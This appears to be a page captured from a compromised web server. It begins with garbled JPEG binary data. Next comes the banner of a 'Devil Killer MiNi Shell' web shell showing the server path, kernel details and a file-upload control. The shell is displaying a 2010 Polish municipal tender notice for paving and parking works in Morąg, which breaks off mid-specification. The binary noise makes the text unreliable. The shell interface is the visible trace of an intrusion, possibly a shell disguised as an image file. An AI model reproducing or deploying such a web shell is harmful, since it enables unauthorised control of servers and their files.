JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100610/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100610/163342-N-2010.html

<p class="kh_header"><b>Morąg: Wykonanie nawierzchni utwardzonych z kostki betonowej na terenie Gminy Morąg</b><br>
<b>Numer ogłoszenia: 163342 - 2010; data zamieszczenia: 10.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie nawierzchni utwardzonych z kostki betonowej na terenie Gminy Morąg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 Budowa ulicy wewnętrznej od Al. Parkowej w stronę ul. Mickiewicza w Morągu 

Opis: Przedmiotem inwestycji jest budowa drogi i chodników od Alei Parkowej do zapleczy obiektów usługowych wraz z odwodnieniem.
 - powierzchnia drogi i chodnika  570,9+126,6=697,5 m2     
Nawierzchnia z kostki Polbruk na podbudowie z kamienia łamanego.
             
- Podłoże G-2 
- Szerokość drogi głównej 6m 
- Szerokość pozostałych dróg dojazdowych  zmienna 6-3m 
 - Szerokość poboczy 0,5m    

Rzędne wysokościowe  pokrywają się z istniejącymi rzędnymi , będąc  związanymi z sąsiadującymi wysokościami przylegających zjazdów i wejść do budynków.  Całość drogi ma spadek podłużny w kierunku Alei Parkowej ze spadkiem 1,1 i 1,8%.

Droga:  
-   Kostka betonowa  8 cm na warstwie wyrównawczej z mieszanki cem. piask. grubości 3-5cm. 
-   Górna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-32,5 mm grubości 8cm 
-   Dolna warstwa podbudowy z tłucznia kamiennego uziarnieniu 0-63mm  zbrojonego geosiatką komórkową o dużych komórkach grubości 10cm 
-   Warstwa odsączająca z piasku grubości 15cm po zagęszczeniu 
-   Geowłóknina o gramaturze 75g/m2 
Istniejącą nawierzchnię z trylinki na działce nr 2-584/7 należy przełożyć poprawiając jej równość oraz rzędne  wysokościowe dopasowane do projektowanych. 

Chodnik : 
 
-  Kostka betonowa 6 cm na warstwie wyrównawczej z mieszanki cem. piask. 3-5cm 
-  Warstwa odsączająca z piasku gr. 15 cm po zagęszczeniu. 

Krawężnik posadowić na ławie betonowej z oporem grubości 15 cm  z betonu B-15. na wysokości 12 cm  powyżej poziomu nawierzchni . 
Warstwa podsypki o grubości 15cm powinna być wykonana z piasku, albo żwiru.

Odwodnienie 
 
Właściwe odwodnienie powierzchniowe mają zapewnić spadki podłużne i poprzeczne.  Dalszy bieg wód opadowych przejmie kratka ściekowa na studni fi 500 z osadnikiem połączona do istniejącej sieci kanalizacji deszczowej  na ulicy Parkowej. 
Na wyjeździe na ulicę Parkową ustawić znak A-7 na słupku stalowym. 
Roboty w pobliżu urządzeń odziemnych wykonywać ręcznie z zachowaniem ostrożności ,na skrzyżowaniach z urządzeniami podziemnymi założyć rury osłonowe AROT 115mm.
Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych.

Zadanie Nr 2 Budowa parkingu przy kompleksie sportowym ORLIK 2012 przy ul. Sienkiewicza w Morągu 
 
Opis: Przedmiotem inwestycji jest budowa parkingu obsługującego kompleks sportowy przy ulicy Sienkiewicza w Morągu.
Inwestycja polega na wykonaniu parkingu wzdłuż ogrodzenia kompleksu sportowego   na 15 stanowisk usytuowanych pod kątem 45 stopni .Do włączenia służy istniejący zjazd na teren boiska , a do wyjazdu służyć będzie przebudowany istniejący zjazd. 
- powierzchnia parkingu  529,6 m 2    
- podłoże G-1            
- Szerokość zatoki postojowej  4,5m 
- Szerokość stanowisk postojowych 2,3m 
- Długość stanowisk postojowych 6,7m 

Szerokość istniejącego wjazdu na parking 4,7m  Szerokość wyjazdu z parkingu  4,7m  Zjazd na ulicę powiatową wyokrąglony łukami kołowymi o promieniu 3m.  Krawędź parkingu przylega do krawędzi chodnika z płytek betonowych. 

Przyjęto nawierzchnię o następującej budowie : 
 
-   Nawierzchnia z kostki Polbruk 8cm na warstwie wyrównawczej z mieszanki piaskowo - cementowej grubości 3-5cm. 
-   Górna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-32,5 mm grubości 8cm 
-   Dolna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-63mm  grubości 15cm 
-   Warstwa odsączająca z piasku grubości 15cm po zagęszczeniu. 

Krawężnik posadowić na ławie betonowej z oporem grubości 15 cm  z betonu B-15. na wysokości 12 cm  powyżej poziomu nawierzchni . Na krawędzi zjazdu przy ulicy Sienkiewicza wykonać krawężnik najazdowy . 
 Warstwa podsypki o grubości 15cm powinna być wykonana z piasku, albo żwiru. 
Właściwe odwodnienie powierzchniowe mają zapewnić spadki podłużne i poprzeczne.  Dalszy bieg wód opadowych przejmą urządzenia odwadniające. 
Do odwodnienia w miejscach spływu wód zastosowano dwie kratki ściekowe  na studniach fi 500 z odstojnikiem min. 0,5m głębokości z odprowadzeniem 
przykanalikiem fi 200 do studni kanalizacji burzowej. Kratki służą zebraniu większości wód opadowych do sieci. Niewielka ilość wody na zjazdach spłynie do kratek położonych na ulicy powiatowej. 
Znaki pionowe wykonać zgodnie z planem sytuacyjnym , mocując  na słupach stalowych ocynkowanych na wysokości 2m ponad nawierzchnię chodnika. 
Znaki poziome P-10 wykonać z farby chlorokauczukowej białej z kulkami szklanymi zgodnie z planem sytuacyjnym. Stanowiska postojowe wykonać z kostki o barwie kontrastującej w sposób widoczny z tłem nawierzchni parkingu. Proponuje się kolor parkingu szary i kolor linii stanowisk czerwony. 
Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu zamówień tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.24-4, 45.22.33.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla zadania częściowego nr 1:  3 000.00 PLN (słownie:  trzy tysiące 00/100 PLN)
Dla zadania częściowego nr 2:  3 500.00 PLN (słownie:  trzy tysiące pięćset 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia-Załącznik nr 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - Załącznika nr 2.
Dysponowanie osobą, której zamierza powierzyć funkcję kierownika budowy do:
- kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówie?nia, jeżeli suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia nie będzie niższa niż 100 000,00zł.
W przypadku składania oferty wspólnej ww. dokumenty składa każdy z wykonawców składających ofertę wspólną. Warunek wysokości sumy ubezpieczenia zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o zgodności z warunkami przetargu
2. Zobowiązanie do wniesienia zabezpieczenia
3. Dowód wpłaty wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach: 
1.Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron w formie pisemnego aneksu pod rygorem nieważności.
2.Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:
a)Zmiany kwoty wynagrodzenia:
- w przypadku zmiany albo wprowadzenia nowych przepisów lub norm, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, w tym zwłaszcza w zakresie stawki podatku VAT,
-  w przypadku wystąpienia robót uzupełniających, dodatkowych lub zamiennych / koszty tych robót przyjmowane będą na podstawie kosztorysów sporządzonych wg ustalonych składników cenotwórczych zawartych w formularzu ofertowym Wykonawcy/,
- w przypadku wykonania mniejszego zakresu robót niż określony w dokumentacji technicznej proporcjonalnie do zakresu rzeczowego.
b)Zmiany terminu wykonania przedmiotu zamówienia:
- w przypadku zlecenia wykonania robót dodatkowych lub zamiennych jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu umownego,
- w przypadku wystąpienia anomalii pogodowych lub innych nieprzewidywalnych przyczyno charakterze obiektywnym, mających znaczny wpływ na termin wykonania,
- w związku ze stwierdzeniem braków lub błędów projektowych o czas niezbędny na poprawienie lub uzupełnienie projektu,
- w przypadku udzielenia zamówień uzupełniających przewidzianych w SIWZ pkt 4.1 jeżeli terminy ich zlecenia uniemożliwiają dotrzymanie pierwotnego terminu umownego,
Okres wydłużenia terminu zakończenia powinien odpowiadać okresom opóźnień wymienionych powyżej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.morag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu
14-300 Morąg
ul. 11 Listopada 9
pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2010 godzina 09:00, miejsce: Urząd Miejski w Morągu 
14-300 Morąg 
ul. 11 Listopada 9 
pokój nr 30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa ulicy wewnętrznej od Al. Parkowej w stronę ul. Mickiewicza w Morągu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest budowa drogi i chodników od Alei Parkowej do zapleczy obiektów usługowych wraz z odwodnieniem.
 - powierzchnia drogi i chodnika  570,9+126,6=697,5 m2     
Nawierzchnia z kostki Polbruk na podbudowie z kamienia łamanego.
             
- Podłoże G-2 
- Szerokość drogi głównej 6m 
- Szerokość pozostałych dróg dojazdowych  zmienna 6-3m 
 - Szerokość poboczy 0,5m    

Rzędne wysokościowe  pokrywają się z istniejącymi rzędnymi , będąc  związanymi z sąsiadującymi wysokościami przylegających zjazdów i wejść do budynków.  Całość drogi ma spadek podłużny w kierunku Alei Parkowej ze spadkiem 1,1 i 1,8%.

Droga:  
-   Kostka betonowa  8 cm na warstwie wyrównawczej z mieszanki cem. piask. grubości 3-5cm. 
-   Górna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-32,5 mm grubości 8cm 
-   Dolna warstwa podbudowy z tłucznia kamiennego uziarnieniu 0-63mm  zbrojonego geosiatką komórkową o dużych komórkach grubości 10cm 
-   Warstwa odsączająca z piasku grubości 15cm po zagęszczeniu 
-   Geowłóknina o gramaturze 75g/m2 
Istniejącą nawierzchnię z trylinki na działce nr 2-584/7 należy przełożyć poprawiając jej równość oraz rzędne  wysokościowe dopasowane do projektowanych. 

Chodnik : 
 
-  Kostka betonowa 6 cm na warstwie wyrównawczej z mieszanki cem. piask. 3-5cm 
-  Warstwa odsączająca z piasku gr. 15 cm po zagęszczeniu. 

Krawężnik posadowić na ławie betonowej z oporem grubości 15 cm  z betonu B-15. na wysokości 12 cm  powyżej poziomu nawierzchni . 
Warstwa podsypki o grubości 15cm powinna być wykonana z piasku, albo żwiru.

Odwodnienie 
 
Właściwe odwodnienie powierzchniowe mają zapewnić spadki podłużne i poprzeczne.  Dalszy bieg wód opadowych przejmie kratka ściekowa na studni fi 500 z osadnikiem połączona do istniejącej sieci kanalizacji deszczowej  na ulicy Parkowej. 
Na wyjeździe na ulicę Parkową ustawić znak A-7 na słupku stalowym. 
Roboty w pobliżu urządzeń odziemnych wykonywać ręcznie z zachowaniem ostrożności ,na skrzyżowaniach z urządzeniami podziemnymi założyć rury osłonowe AROT 115mm.
Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.24-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa parkingu przy kompleksie sportowym ORLIK 2012 przy ul. Sienkiewicza w Morągu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest budowa parkingu obsługującego kompleks sportowy przy ulicy Sienkiewicza w Morągu.
Inwestycja polega na wykonaniu parkingu wzdłuż ogrodzenia kompleksu sportowego   na 15 stanowisk usytuowanych pod kątem 45 stopni .Do włączenia służy istniejący zjazd na teren boiska , a do wyjazdu służyć będzie przebudowany istniejący zjazd. 
- powierzchnia parkingu  529,6 m 2    
- podłoże G-1            
- Szerokość zatoki postojowej  4,5m 
- Szerokość stanowisk postojowych 2,3m 
- Długość stanowisk postojowych 6,7m 

Szerokość istniejącego wjazdu na parking 4,7m  Szerokość wyjazdu z parkingu  4,7m  Zjazd na ulicę powiatową wyokrąglony łukami kołowymi o promieniu 3m.  Krawędź parkingu przylega do krawędzi chodnika z płytek betonowych. 

Przyjęto nawierzchnię o następującej budowie : 
 
